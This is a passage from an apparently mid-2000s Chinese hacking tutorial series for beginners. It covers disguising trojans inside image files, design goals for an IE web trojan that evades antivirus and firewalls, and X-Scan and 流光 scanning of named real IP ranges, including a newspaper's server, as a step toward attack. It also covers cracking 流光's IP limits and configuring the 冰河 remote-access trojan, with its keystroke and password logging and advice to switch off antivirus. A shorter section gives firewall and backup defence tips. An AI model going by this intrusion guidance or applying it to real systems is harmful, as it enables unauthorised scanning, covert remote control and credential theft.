捆綁软体现在很多,具体使用就是把木马用户端和一个其他檔捆綁在一起(拿JPG圖像为例),你看到的檔可能是.jpg,圖示也是正常(第2条直接传的木马用户端是个windows无法识别檔的圖示,比较好认),特别是现在有些捆綁软体对捆綁过后的软体进行優化,殺毒软体很难识别其中是否包含木马程式。建议:不要打开陌生人传递的檔。特别是圖像檔。(誘惑力大哦)
4.高深的编譯
对木马客户程式进行编譯。让木马更加难以识别。(其实效果同第三条)
5.微妙的网页嵌入
将木马安装在自己的主页里面,当你打开页面就自动下載运行。(見下篇,打造网页木马)“你中獎了,请去www.**.com領取你的獎品”,骇客可能这么和你说。建议:陌生人提供的网页不要打开,不要去很奇怪名字的网站。及时升级殺毒软体。
總结:及时升级殺毒软体。不要打开未知檔以及陌生人传来的檔。不要隨便打开陌生网页。升级最新版本的作業系统。还有....请看本專題以后的文章咯。
============================================================
你也可以当骇客 打造完美的IE网页木马
(殘语:比较适合骇客中级选手,日后将推出視頻教程)
既然要打造完美的IE网页木马,首先就必须给我们的完美制定一个标準,我个人认为一个完美的IE网页木马至少应具備下列四项特徵:
一:可以躲过殺毒软体的追殺;
二:可以避开网路防火墙的報警;
三:能够适用于多数的Windows作業系统(主要包括Windows 98、Windows Me、Windows 2000、Windows XP、Windows 2003)中的多数IE版本(主要包括IE5.0、IE5.5、IE6.0),最好能打倒SP補丁;
四:让流览者不容易发覺IE变化,即可以悄无聲息,从而可以长久不被发现。
(注意以上四点只是指网页本身而言,但不包括你的木马程式,也就是说我们的网页木马只是負責运行指定的木马程式,至于你的木马程式的好坏只有你自己去选择啦!别找我要,我不会写的哦!)
满足以上四点我想才可以让你的马兒更青春更长久,跑的更歡更快……
看了上面的几点你是不是心动拉?别急,我们还是先侃侃现有的各种IE网页木马的不足吧!
第一种:利用古老的MIME漏洞的IE网页木马
这种木马现在还在流行,但因为此漏洞太过古老且适用的IE版本较少,而当时影響又太大,補丁差不多都補上啦,因此这种木马的种植成功率比较低。
第二种:利用com.ms.activeX.ActiveXComponent漏洞,结合WSH及FSO控制项的IE网页木马
雖然com.ms.activeX.ActiveXComponent漏洞廣泛存在于多数IE版本中,是一个比较好的漏洞,利用价值非常高,但卻因为它结合了流行的病毒調用的WSH及FSO控制项,使其雖说可以避开网路防火墙的報警,可逃不脫殺毒软体的追捕(如諾頓)。
第三种:利用OBJECT物件类型確认漏洞(ObjectDataRemote)并结合WSH及FSO控制项的IE网页木马(典型的代表有动鯊网页木马生成器)
此种木马最大的優点是适应的IE版本多,且漏洞较新,但卻有如下不足:
1、因为此漏洞要調用Mshta.exe来访問网路下載木马程式,所以会引起防火墙報警(如天网防火墙);
2、如果此IE网页木马又利用了WSH及FSO控制项,同样逃不脫殺毒软体的追捕(如諾頓),而动鯊网页木马又恰恰使用了WSH及FSO控制项,歎口氣……可惜呀……?
3、再有就是这个漏洞需要网页伺服器支援动態网页如ASP、JSP、CGI等,这就影響了它的发揮,毕竟现在的免費穩定的动態网页空间是少之又少;雖说此漏洞也可利用郵件MIME的形式来利用,但经測试发现对IE6.0不起作用。
看到上面的分析你是不是有了这种感覺:千軍易得,一将难求,马兒成群,奈何千里马难寻!别急,下面让我帶这大家一起打造我心中的完美IE网页木马。
=======================================================
扫描器的使用
这里我使用x-scanner作为介绍物件,原因是x-scanner集成了多种扫描功能于一身,它可以采用多线程方式对指定IP位址段(或独立IP位址)进行安全漏洞扫描,提供了圖形介面和命令行两种操作方式,扫描内容包括:标準埠狀態及埠banner资讯、CGI漏洞、RPC漏洞、SQL-SERVER默认帳户、FTP弱口令,NT主机共用资讯、用户资讯、組资讯、NT主机弱口令用户等。扫描结果保存在/log/目录中,index_*.htm为扫描结果索引檔。对于一些已知的CGI和RPC漏洞,x-scanner给出了相应的漏洞描述、利用程式及解决方案,节省了查找漏洞介绍的时间。
首先x-scanner包括了两个运行程式:xscann.exe和xscan_gui.exe,这两个程式分别是扫描器的控制台版本和視窗版本,作为初学者可能更容易接受視窗版本的扫描软体,因为毕竟初学者使用最多的还是“应用程式”,无论运行那一个版本,他们的功能都是一样的。首先让我们运行視窗版本看看:視窗分为左右两部分,左面是进行扫描的类型,这包括前面提到的漏洞扫描、埠扫描等基本内容;另一部分是有关扫描範圍的設定,xscanner可以支持对多个IP位址的扫描,也就是说使用者可以利用xscanner成批扫描多个IP位址,例如在IP位址範圍内輸入211.100.8.1-211.100.8.255就会扫描整个C类的255台伺服器(如果存在的話),这样骇客可以針对某一个漏洞进行搜索,找到大範圍内所有存在某个漏洞的伺服器。当然如果只輸入一个IP位址,扫描程式将針对單独IP进行扫描。
剩下的埠設定在前面已经介绍过,一般对于网站伺服器,这个埠选取80或者8080,对于某些特殊的伺服器也许还有特殊的埠号,那需要通过埠扫描进行寻找。多线程扫描是这个扫描器的一大特色,所谓多线程就是说同时在本地系统开闢多个socket連接,在同一时间内扫描多个伺服器,这样做的好处是提高了扫描速度,节省时间,根據系统的资源配置高低,线程数位也可以自行設定(設定太高容易造成系统崩溃)。
在圖形介面下我们看到了程式連接位址“.\xscan.exe”,这实际上就是xscanner的控制台程式,也就是说圖形視窗只是将控制台扫描器的有关參数設置做了“傻瓜化”处理,程式运行真正执行的还是控制台程式。因此学习控制台是骇客所必需的,而且使用控制台模式的程式也是真正骇客喜爱的操作方式。
现在我们进行一个簡單的cgi漏洞扫描,这次演练是在控制台模式下进行的:xscan211.100.8.87 -port
这个命令的意思是让xscanner扫描伺服器211.100.8.87的开放埠,扫描器不会对65535个埠全部进行扫描(太慢),它只会檢測网路上最常用的几百个埠,而且每一个埠对应的网路服務在扫描器中都已经做过定義,从最后返回的结果很容易了解伺服器运行了什么网路服務。扫描结果顯示如下:
Initialize dynamic librarysucceed.
Scanning 211.100.8.87......
[211.100.8.87]: Scaningport state ...
[211.100.8.87]: Port 21 islistening!!!
[211.100.8.87]: Port 25 islistening!!!
[211.100.8.87]: Port 53 islistening!!!
[211.100.8.87]: Port 79 islistening!!!
[211.100.8.87]: Port 80 islistening!!!
[211.100.8.87]: Port 110 islistening!!!
[211.100.8.87]: Port 3389is listening!!!
[211.100.8.87]: Port scancompleted, found 7.
[211.100.8.87]: All done.
这个结果还会同时在log目录下生成一个html文檔,阅读文檔可以了解发放的埠对应的服務專案。从结果中看到,这台伺服器公开放了七个埠,主要有21埠用于檔传輸、80埠用于网页流览、还有110埠用于pop3电子郵件,如此一来,我们就可以进行有关服務的漏洞扫描了。(关于埠的詳細解释会在后續给出)
然后可以使用流览看看这个伺服器到底是做什么的,通过流览发现原来这是一家報社的电子版面,这样骇客可以繼續对伺服器进行漏洞扫描查找伺服器上是否存在perl漏洞,之后进行进一步进攻。
漏洞扫描的道理和埠扫描基本上类似,例如我们可以通过扫描器查找61.135.50.1到61.135.50.255这255台伺服器上所有开放了80埠的伺服器上是否存在漏洞,并且找到存在什么漏洞,则可以使用xscan61.135.50.1-61.135.50.255 -cgi进行扫描,因为结果比较多,通过控制台很难阅读,这个时候xscanner会在log下生成多个html的中文说明,进行阅读这些文檔比较方便。
二、扫描器使用問題:
載使用漏洞扫描器的过程中,学习者可能会经常遇到一些問題,这里给出有关問題產生的原因和解决辦法。扫描器的使用并不是真正骇客生涯的开始,但它是学习骇客的基础,所以学习者应该多加练习,熟练掌握手中使用的扫描器,了解扫描器的工作原理和問題的解决辦法。
1、为什么我找不到扫描器報告的漏洞?
扫描器報告伺服器上存在某个存在漏洞的檔,是发送一个GET请求并接收伺服器返回值来判断檔是否存在,这个返回值在HTTP的协议中有詳細的说明,一般情況下“200”是檔存在,而“404”是没有找到檔,所以造成上面现象的具体原因就暴露出来了。
造成这个問題的原因可能有两种:第一种可能性是您的扫描器版本比较低,扫描器本身存在“千年蟲”問題,对于返回的资讯扫描器在判断的时候,会错误的以为时间资讯2000年x月x日中的200是“檔存在”标誌,这样就会造成误報;
另外一种可能性是伺服器本身对“檔不存在”返回的頭部资讯进行了更改,如果GET申请的檔不存在,伺服器会自动指向一个“没有找到页面”的文檔,所以无论檔是否存在,都不会将“404”返回,而是仍然返回成功资讯,这样做是为了迷惑漏洞扫描器,让攻击者不能真正判断究竟那个漏洞存在于伺服器上。
这一問題的解决辦法也要分情況討论,一般说来第一种情況比较容易解决,直接升级漏洞扫描器就可以了,对于第二种情況需要使用者对网路比较熟悉,有能力的話可以自己编写一个漏洞扫描器,自己编写的扫描器可以針对返回檔的大小进行判断,这样就可以真正確定檔是否存在,但这种方法对使用者的能力要求较高。
2、我使用的扫描器速度和网路速度有关係嘛?
关係不大。扫描器发送和接收的资讯都很小,就算是同时发送上百个GET请求一般的电話上网用户也完全可以做得到,影響扫描器速度的主要因素是伺服器的应答速度,这取决于被扫描伺服器的系统运行速度。如果使用者希望提高自己的扫描速度,可以使用支援多线程的扫描器,但是因为使用者本地电脑檔次問題,也不可能将线程設置到上百个,那样的話会造成本地系统癱瘓,一般使用30个线程左右比较合适。
另外对于很多网路服務器来说,为了防止骇客的扫描行为,可能会在防火墙上設置同一IP的單位时间GET申请数量,这样做目的就是避免骇客的扫描和攻击,所以在提高本地扫描速度之前,应该先確认伺服器没有相应的过濾功能之后再使用。
3、扫描器報告给我的漏洞无法利用是什么原因?
確切地说扫描器報告的不是“找到的漏洞”,而是找到了一个可能存在漏洞的檔,各种网路应用程式都可能存在漏洞,但是在更新版本的过程中,老版本的漏洞会被修補上,被扫描器找到的檔应该经过手工操作確认其是否是存在漏洞的版本,这可以通过阅读网路安全网站的“安全公告”获得相应知识。
对于已经修補上漏洞的檔来说,也不代表它一定不再存有漏洞,而只能说在一定程度上没有漏洞了,也许在明天,这个新版本的檔中又会被发现还存在其他漏洞,因此这需要网路安全爱好者时刻关注安全公告。当然如果攻击者或者网路管理员对编程比较熟悉,也可以自己阅读程式并力圖自己找到可能的安全隱患,很多世界者名的骇客都是不依*他人,而是自己寻找漏洞进行攻击的。
4、扫描器版本比较新,然而卻从来没有找到过漏洞是什么原因?
有一些扫描器專门設計了“等待时间”,经过設置可以对等待返回资讯的时间进行調整,这就是说在“网路連接超时”的情況下,扫描器不会傻傻的一直等待下去。但如果你的网路速度比较慢,有可能造成扫描器没有来得及接收返回资讯就被认为“超时”而越了过去繼續下面的扫描,这样当然是什么也找不到啦。
如果問題真的如此,可以将等待时间設置的长一些,或者换个ISP撥号連接。
5、扫描器報告伺服器没有提供HTTP服務?
网路上大多数HTTP伺服器和漏洞扫描器的默认埠都是80,而有少量的HTTP伺服器并不是使用80埠提供服務的,在確认伺服器的確开通了网站服務的情況下,可以用埠扫描器察看一下对方究竟使用什么埠进行的HTTP服務,网路上常見的埠还有8080。
另外这种情況还有一种可能性,也许是使用者对扫描器的參数設置不正確造成的,很多扫描器的功能不僅僅是漏洞扫描,有可能还提供了rpc扫描、ftp默认口令扫描和NT弱口令扫描等多种功能,因此在使用每一款扫描器之前,都应该自己阅读有关的帮助说明,確保問題不是出在自己身上。
6、扫描器使用过程中突然停止回应是为什么?
扫描器停止回应是很正常的,有可能是因为使用者連接的线程过多,本地系统资源不足而造成系统癱瘓、也可能是因为对方伺服器的回应比较慢,依次发送出去的请求被同时反送回来而造成资讯阻塞、还有可能是伺服器安装了比较惡毒的防火墙,一旦察覺有人扫描就发送特殊的资料報回来造成系统癱瘓……
因此扫描器停止回应不能簡單的说是为什么,也没有一个比较全面的解决方案,不过一般情況下遇到这种問題,我建议你可以更换其他扫描器、扫描另外一些伺服器试试,如果問題还没有解决,就可能是因为扫描器與你所使用的系统不相容造成的,大多数基于微软視窗的漏洞扫描器都是运行在Windows9X下的,如果是Win2000或者NT也有可能造成扫描器无法正常工作。
7、下載回来的扫描器里面怎么没有可执行檔?
扫描器不一定非要是可执行的exe檔,其他例如perl、cgi脚本语言也可以编写扫描器,因此没有可执行檔的扫描器也许是运行在网路服務器上的,这种扫描器可以被植入到网路上的其他系统中,不需要使用者上网就能够24小时不停的进行大面积位址扫描,并将结果整理、分析,最后通过Email发送到指定的电子信箱中,因此这是一种比较高级的扫描器,初学者不适合使用。
另外注意載下在扫描器的时候注意壓縮報檔的副檔名,如果是tar为副檔名,那么这个扫描器是运行在Linux系统下的,这种其他操作平台的扫描器无法在視窗平台下应用,檔格式也和FAT32不一样。
8、扫描器只報告漏洞名稱,不報告具体文件怎么辦?
只要漏洞被发现,网路安全組織即会为漏洞命名,因此漏洞名稱对应的檔在相当廣泛的範圍内都是统一的,只要知道了漏洞的名稱,骇客就可以通过專门的漏洞搜索引擎进行查找,并且学习到與找到漏洞相关的詳細资讯。这种“漏洞搜索引擎”在网路上非常多,例如我国“綠盟”提供的全中文漏洞搜索引擎就是比较理想的一个。
===========================================================
如何防範骇客
骇客对伺服器进行扫描是輕而易举的,一旦找到了伺服器存在的問題,那么后果将是嚴重的。这就是说作为网路管理员应该采取不要的手段防止骇客对伺服器进行扫描,本节我将談談如何才能让自己的伺服器免遭骇客扫描。
一、防範骇客心得体会:
1、遮罩可以IP位址:
这种方式見效最快,一旦网路管理员发现了可疑的IP位址申请,可以通过防火墙遮罩相对应的IP位址,这样骇客就无法在連接到伺服器上了。但是这种方法有很多缺点,例如很多骇客都使用的动態IP,也就是说他们的IP位址会变化,一个位址被遮罩,只要更换其他IP仍然可以进攻伺服器,而且高级骇客有可能会伪造IP地址,遮罩的也许是正常用户的地址。
2、过濾资讯包:
通过编写防火墙規则,可以让系统知道什么样的资讯包可以进入、什么样的应该放棄,如此一来,当骇客发送有攻击性资讯包的时候,在经过防火墙时,资讯就会被丟棄掉,从而防止了骇客的进攻。但是这种做法仍然有它不足的地方,例如骇客可以改变攻击性代码的形態,让防火墙分辨不出资讯包的真假;或者骇客乾脆无休止的、大量的发送资讯包,知道伺服器不堪重負而造成系统崩溃。
3、修改系统协定:
对于漏洞扫描,系统管理员可以修改伺服器的相应协定,例如漏洞扫描是根據对檔的申请返回值对檔存在进行判断的,这个数值如果是200则表示檔存在于伺服器上,如果是404则表明伺服器没有找到相应的檔,但是管理员如果修改了返回数值、或者遮罩404数值,那么漏洞扫描器就毫无用处了。
4、经常升级系统版本:
任何一个版本的系统发佈之后,在短时间内都不会受到攻击,一旦其中的問題暴露出来,骇客就会蜂擁而致。因此管理员在维护系统的时候,可以经常流览者名的安全站点,找到系统的新版本或者補丁程式进行安装,这样就可以保证系统中的漏洞在没有被骇客发现之前,就已经修補上了,从而保证了伺服器的安全。
5、及时備份重要资料:
亡羊補牢,如果资料備份及时,即便系统遭到骇客进攻,也可以在短时间内修复,挽回不必要的经濟損失。想国外很多商務网站,都会在每天晚上对系统资料进行備份,在第二天清晨,无论系统是否收到攻击,都会重新恢复资料,保证每天系统中的资料庫都不会出现損坏。资料的備份最好放在其他电脑或者驅动器上,这样骇客进入伺服器之后,破坏的资料只是一部分,因为无法找到资料的備份,对于伺服器的損失也不会太嚴重。
然而一旦受到骇客攻击,管理员不要只設法恢复損坏的资料,还要及时分析骇客的来源和攻击方法,尽快修補被骇客利用的漏洞,然后檢查系统中是否被骇客安装了木马、蠕蟲或者被骇客开放了某些管理员帳号,尽量将骇客留下的各种蛛絲马迹和后门分析清除、清除乾淨,防止骇客的下一次攻击。
6、使用加密机制传輸资料:
对于个人信用卡、密码等重要资料,在用户端與伺服器之间的传送,应该仙经过加密处理在进行发送,这样做的目的是防止骇客監听、截获。对于现在网路上流行的各种加密机制,都已经出现了不同的破解方法,因此在加密的选择上应该寻找破解困难的,例如DES加密方法,这是一套没有逆向破解的加密演算法,因此骇客的到了这种加密处理后的檔时,只能采取暴力破解法。个人用户只要选择了一个優秀的密码,那么骇客的破解工作将会在无休止的尝试后终止。
二、防火墙使用说明:
1.什么是防火墙?
防火墙的英文叫做firewall,它能够在网路與电脑之间建立一道監控屏障,保护在防火墙内部的系统不受网路骇客的攻击。邏輯上講,防火墙既是资讯分離器、限制器,也是资讯分析器,它可以有效地对局域网和Internet之间的任何活动进行監控,从而保证局域网内部的安全。
网路上最者名的软体防火墙是LockDown2000,这套软体需要经过註冊才能获得完整版本,它的功能強大,小到保护个人上网用户、大到维护商務网站的运作,它都能出色的做出驚人的表现。但因为软体的註冊需要一定費用,所以对个人用户来说还是选择一款免費的防火墙更现实。天网防火墙在这里就更加适合个人用户的需要了,天网防火墙个人版是一套给个人电脑使用的网路安全程式,它能够抵擋网路入侵和攻击,防止资讯洩露。
2、天网防火墙的基本功能:
天网防火墙个人版把网路分为本地网和互联网,可以針对来自不同网路的资讯,来設置不同的安全方案,以下所述的問題都是針对互联网而言的,故所有的設置都是在互联网安全级别中完成的。 怎样防止资讯洩露? 如果把檔共用向互联网开放,而且又不設定密码,那么别人就可以輕鬆的通过互联网看到您机器中的檔,如果您还允许共用可写,那别人甚至可以刪除檔。 你可以在个人防火墙的互联网安全级别設置中,将NETBIOS 关閉,这样别人就不能通过INTERNET访問你的共用资源了(这种設置不会影響你在局域网中的资源分享)。
当撥号用户上网获得了分配到的IP位址之后,可以通过天网防火墙将ICMP关閉,这样骇客用PING的方法就无法確定使用者的的系统是否处于上网狀態,无法直接通过IP位址获得使用者系统的资讯了。
需要指出的是:防火墙攔截的资讯并不完全是攻击资讯,它记录的只是系统在安全設置中所拒絕接收的资料包。在某些情況下,系统可能会收到一些正常但又被攔截的资料包,例如某些路由器会定时发出一些IGMP包等;或有些主机会定时PING出资料到本地系统確认連接仍在维持者,这个时候如果利用防火墙将ICMP和IGMP遮罩了,就会在安全记录中見到这些被攔截的资料包,因此这些攔截下来的资料包并不一定是骇客对系统进行攻击造成的。
3、使用防火墙的益处:
使用防火墙可以保护脆弱的服務,通过过濾不安全的服務,Firewall可以极大地提高网路安全和減少子网中主机的風險。例如,Firewall可以禁止NIS、NFS服務通过,同时可以拒絕源路由和ICMP重定向封包。
另外防火墙可以控制对系统的访問许可权,例如某些企業允许从外部访問企業内部的某些系统,而禁止访問另外的系统,通过防火墙对这些允许共用的系统进行設置,还可以設定内部的系统只访問外部特定的Mail Server和Web Server,保护企業内部资讯的安全。
4、防火墙的种类:
防火墙總体上分为包过濾、应用级閘道和代理伺服器等三种类型:
(1)数據包过濾
资料包过濾(PacketFiltering)技术是在网路層对资料包进行选择,选择的依據是系统内設置的过濾邏輯,被稱为访問控制表(Access ControlTable)。通过檢查资料流程中每个资料包的源位址、目的地址、所用的埠号、协定狀態等因素,或它们的組合来確定是否允许该资料包通过。 资料包过濾防火墙邏輯簡單,价格便宜,易于安装和使用,网路性能和透明性好,它通常安装在路由器上。路由器是内部网路與Internet連接必不可少的設備,因此在原有网路上增加这样的防火墙几乎不需要任何額外的費用。
资料包过濾防火墙的缺点有二:一是非法访問一旦突破防火墙,即可对主机上的软体和配置漏洞进行攻击;二是资料包的源位址、目的地址以及IP的埠号都在资料包的頭部,很有可能被竊听或假冒。
(2)应用级閘道
应用级閘道(ApplicationLevel Gateways)是在网路应用層上建立协定过濾和轉发功能。它針对特定的网路应用服務协定使用指定的资料过濾邏輯,并在过濾的同时,对资料包进行必要的分析、登记和统計,形成報告。实际中的应用閘道通常安装在專用工作站系统上。
资料包过濾和应用网关防火墙有一个共同的特点,就是它们僅僅依*特定的邏輯判定是否允许资料包通过。一旦满足邏輯,则防火墙内外的电脑系统建立直接联系,防火墙外部的用户便有可能直接了解防火墙内部的网路结構和运行狀態,这有利于实施非法访問和攻击。
(3)代理服務
代理服務(Proxy Service)也稱鏈路级閘道或TCP通道(Circuit LevelGateways or TCP Tunnels),也有人将它歸于应用级閘道一类。它是針对资料包过濾和应用閘道技术存在的缺点而引入的防火墙技术,其特点是将所有跨越防火墙的网路通信鏈路分为两段。防火墙内外电脑系统间应用層的" 鏈结",由两个终止代理伺服器上的" 鏈结"来实现,外部电脑的网路鏈路只能到达代理伺服器,从而起到了隔離防火墙内外电脑系统的作用。此外,代理服務也对过往的资料包进行分析、註冊登记,形成報告,同时当发现被攻击迹象时会向网路管理员发出警報,并保留攻击痕迹
=========================================================
骇客之“名詞介绍”
1.肉雞,或者留了后门,可以被我们远端操控的机器,现在许多人把有WEBSHELL许可权的机器也叫肉雞。
2、木马:特洛伊木马,大家在电影《特洛伊》里应该看到了,戰爭是特絡伊故意留下了个木马,多方以为是戰利品,帶回城后,木马里面全是戰士,这种東西,就叫做木马,可以说木马就是一方给肉雞留下的東西,可以做到远端控制的目的,木马还分不同的作用,有盜号專用的木马,有远程控制專用的木马,下面介绍点:盜号專用的有许多,盜QQ的有 啊拉QQ大盜,強強盜QQ,传奇木马生成器,魔獸木马生成器等;远程控制的木马有:冰河(国人的驕傲,中国第一款木马),灰鴿子,PCshare,网路神偷,FLUX等,现在通过线程插入技术的木马也有很多,大家自己找找吧。
3、病毒:这个我想不用解释了吧,相信大家都和它打过交道,病毒大多具有破坏性,传播性,隱秘性,潛伏性。
4、后门:这个就是入侵后为方便我们下次进入肉雞方便点所留下的東西,親切的稱为后门,现在好点的后门有REDMAIN等。
5、CRACK:这个名詞很容易和HACK混淆,但是许多人不理解CRACK这个東西,但是接触过软体破解的人一定了解这个詞 CRACKER分析下就是软体破解者的意思(注意这里有多了个ER),许多共用软体就是我们的CRACKER来完成破解的,就是现在俗稱的XX软体破解版。
6、漏洞:这个名詞相信也不用太多的介绍,根據字面意思也可以理解,就好象一个房子,门很结实,可是有个窗户卻不好,这就很可能造成被别人进入,入侵是也是相对的,必须要有漏洞才可以入侵,这里順便介绍下打補丁的意思,还是用上面的例子门很结实,可窗户不好,这里我们需要把窗户補上,就叫打補丁了,许多人問过我怎样知道自己的机器有漏洞?怎样打補丁?这里也回答下,首先介绍怎样檢查自己奇迹有什么样的漏洞,有款工具簡稱为MBSA是微软公司針对windows系统的安全檢測工具,大家可以去网上找到自己下下来檢測下自己机器有什么样的漏洞,还介绍下微软的漏洞名稱 MS05-001MS05-002 这种形式的前面MS应为是微软的意思吧,05呢是2005年,001是在2005年第一个漏洞(不知道解释的对不,自己的理解)大家还可以下个金山毒霸,金山可以有个漏洞檢測功能,还可以帮你補上相应的補丁,那么怎么打補丁呢?其实这个很簡單,在微软的官方网站里可以輸入 MS05-001(如果你有这个漏洞的話)微软就找出了回应的補丁,下載下来 安装下其实就可以了,呵呵,打補丁也不是什么困难的事情哦。
7、埠:这个是入侵是很重要的一个環节,埠这个東西就好象是我要買東西,需要在1号視窗来结帳,而开放的1号視窗就好比回应的埠,埠可以形象的比喻成視窗,呵呵,不同的埠开放了不同的服務,大家可以在网上找到埠对照表来看下不同的埠开放的是什么服務。
8、许可权:这个東西和人权一个效果,我们有自己的权利,但是我们的权利不能超出自己的範圍,比如法律可以控制人的生命,这种最高许可权呢就是电脑中的 Admin许可权 最高许可权,法官呢是执行法律的人,比法律底点,这个呢就是SYSTEM许可权,系统许可权,以下每种人有者自己不同的许可权,比如我们得到了个WEBSHELL许可权,许多人不知道这个是什么许可权,其实就是个WEB(网業)的管理许可权,许可权一般比较低,但是有时想得到个伺服器的ADMIN许可权,就可以先叢WEBSHELL许可权来入手,也就是长说的提权。
==================================================
骇客利器流光使用技巧
流光这款软体除了能够像X-Scan那样扫描眾多 漏洞、弱口令外,还集成了常用的入侵工具,如字典工具、NT/IIS工具等,还独創了能够控制“肉雞”进行扫描的“流光Sensor工具”和为“肉雞”安装服務的“种植者”工具。
與X-Scan相比,流光的功能多一些,但操作起来难免繁杂。由于流光的功能过于強大,而且功能还在不断擴充中,因此流光的作者小榕限制了流光所能扫描的IP範圍,不允许流光扫描国内IP位址,而且流光測试版在功能上也有一定的限制。但是,入侵者为了能够最大限度地使用流光,在使用流光之前,都需要用專门的破解程式对流光进行破解,去除IP範圍和功能上的限制。
安装與打補丁完成后,打开流光,介面如圖所示。
实例:使用流光高级扫描功能檢測210.□.□.2到210.□.□.253网段主机的系统缺陷
步驟一:打开高级扫描嚮導、設置扫描參数。
在流光4.7主介面下,通过选择“檔(F)”→“高级扫描嚮導(W)”或使用快捷健“Ctrl+W”打开高级扫描嚮導。在“起始位址”和“结束位址”分别填入目标网段主机的开始和结束IP位址;在“目标系统”中选择預檢測的作業系统类型;在“获取主机名”、“PING檢查”前面打鉤;在“檢測项目”中,选择“全选”;选好后如圖所示。[morningsky]
然后單击“下一步(N)”按鈕,在圖中选中“标準埠扫描”。
说明:
“标準埠扫描”:只对常見的埠进行扫描。
“自定埠扫描範圍”:自定義埠範圍进行扫描。
然后單击“下一步(N)”按鈕,在圖中进行設置。
設置好所有檢測项目后,然后單击“下一步(N)”按鈕来到圖介面,选择“本地主机”,表示使用本机执行扫描任務。
步驟二:开始扫描。
在圖1-69中單击“开始(S)”按鈕进行扫描。在扫描过程中,如果想要停止,通过單击最下角的“取消”按鈕来实现,不过需要相当一段时间才能真正地停止,所以建议一次不要扫太大的网段,如果因扫描时间过长而等不及,这时候再想让流光停下来是不容易的。
步驟三:查看扫描報告。
扫描结束后,流光会自动打开HTML格式的扫描報告,如圖所示。
需要指出的是,在扫描完成后,流光不僅把扫描结果整理成報告檔,而且还把可利用的主机列在流光介面的最下方,如圖所示。
木马工具詳解+入门工具使用
现在我们来看看木马在骇客学习中的作用。首先学习者要明確木马究竟是什么,同时还要搞清楚木马的类型,并且学习一些流行的木马程式的用法,这是一个相輔相成的学习进程,当骇客利用漏洞进入伺服器之后,就可以选择两条路:一、破坏系统、获得资料、顯示自己;二、利用木马为自己开闢一个合法的登录帳号、掌管系统、利用被入侵系统作为跳板繼續攻击其他系统。
由此看来,木马程式是为第二种情況涉及的一种可以远端控制系统的程式,根據实现木马程式的目的,可以知道这种程式应该具有以下性質:
1、伪装性:程式将自己的服務端伪装成合法程式,并且具有誘惑力的让被攻击者执行,在程式被啟动后,木马代码会在未经授权的情況下运行并装載到系统开始运行进程中;
2、隱藏性:木马程式通病毒程式一样,不会暴露在系统进程管理器内,也不会让使用者察覺到木马的存在,它的所有动作都是伴隨其他程式的运行进行的,因此在一般情況下使用者很难发现系统中木马的存在;
3、破坏性:通过远端控制,骇客可以通过木马程式对系统中的檔进行刪除、编輯操作,还可以进行諸如格式化硬碟、改变系统啟动參数等惡性破坏操作;
4、竊密性:木马程式最大的特点就是可以窺視被入侵电脑上的所有资料,这不僅包括硬碟上的檔,还包括顯示器畫面、使用者在操作电脑过程中在硬碟上輸入的所有命令等。
看了上面的介绍,学习者应该对木马程式的用途有了一个初步了解,并且区分清除木马程式和病毒之间的相同点和不同点,由于骇客手段的日益增多,许多新出现的骇客手段(例如 D.O.S)经常会让学习者思维混乱,但实际上这些新出现的骇客手段都是从最开始的溢出、木马演变出来的,因而对于初学者来说,并不需要急于接触过多的新技术,而是要对最基本的也是最有效的骇客技术进行深入学习。
一、木马的原理:
大多数木马程式的基本原理都是一样的,他们是由两个程式配合使用——被安装在入侵系统内的Server程式;另一个是对Server其控制作用的Client程式。学习者已经了解了木马和病毒的区别,大多数Server程式不会像病毒一样主动传播,而是潛伏在一些合法程式内部,然后由目标操作者親手将其安装到系统中,雖然这一切都是没有经过目标操作者授权的,然而从某种程度上说,这的確是在经过誘惑后目标“心甘情願”接收木马的,当Server安装成功后,骇客就可以通过Client控制程式对Server端进行各种操作了。
木马程式的Server端为了隱藏自己,必须在設計中做到不让自己顯示到任務欄或者系统进程控制器中,同时还不会影響其他程式的正常运行,当使用者电脑处于断线狀態下,Server段不会发送任何资讯到預設的埠上,而会自动檢測网路狀態直到网路連接好,Server会通过email或者其他形式将Server端系统资料通知Client端,同时接收Client发送出来的请求。
二.木马实戰:
先说国產木马老大,冰河-----你不得不了解的工具。
(编者殘语:)说到冰河,也许在2005年的今天顯得很落后,但冰河創造了一个时代,一个人人能做骇客的时代。使用方便簡單,人人都能上手。圖形介面,中文功能表,了解木马,先从了解远端控制软体冰河开始。
======================================================
使用冰河前,请注意:如果你的机器有殺毒软体,可能会出现病毒提示。说实話,他还真是一个病毒。呵呵。所以在使用前,请慎重考慮,出了問題,小编可擔当不起。建议使用不管是用户端还是服務端都请关閉殺毒软体以达到更好的使用效果。
======================================================
软体功能概述:
该软体主要用于远端監控,具体功能包括:
1.自动跟踪目的机螢幕变化,同时可以完全类比鍵盤及滑鼠輸入,即在同步被控端螢幕变化的同时,監控端的一切鍵盤及滑鼠操作将反映在被控端螢幕(局域网适用);
2.记录各种口令资讯:包括开机口令、屏保口令、各种共用资源口令及絕大多数在对話方塊中出现过的口令资讯,且1.2以上的版本中允许用户对该功能自行擴充,2.0以上版本还同时提供了击鍵记录功能;
3.获取系统资讯:包括电脑名、註冊公司、当前用户、系统路徑、作業系统版本、当前顯示解析度、物理及邏輯磁片资讯等多项系统资料;
4.限制系统功能:包括远端关机、远端重啟电脑、鎖定滑鼠、鎖定系统熱鍵及鎖定註冊表等多项功能限制;
5.远程檔操作:包括創建、上传、下載、复制、刪除檔或目录、檔壓縮、快速流览文字檔案、远端打开檔(提供了四中不同的打开方式——正常方式、最大化、最小化和隱藏方式)等多项檔操作功能;
6.註冊表操作:包括对主鍵的流览、增刪、复制、重命名和对鍵值的读写等所有註冊表操作功能;
7.发送资讯:以四种常用圖示向被控端发送簡短资讯;
8.点对点通讯:以聊天室形式同被控端进行线上交談。
一.文件列表:
1. G_Server.exe: 被監控端后台監控程序(运行一次即自动安装,可任意改名),在安装前可以先通过'G_Client'的'配置本端伺服器程式'功能进行一些特殊配置,例如是否将动態IP发送到指定信箱、改变監听埠、設置访問口令等);
2. G_Client.exe: 監控端执行程式,用于監控远端电脑和配置伺服器程式。
二.準備工作:
冰河是一个基于TCP/IP协定和WINDOWS作業系统的网路工具,所以首先应確保该协定已被安装且网路連接无误,然后配置伺服器程式(如果不进行配置则取默认設置),并在欲監控的电脑上运行伺服器端監控程序即可。
三.升级方法:
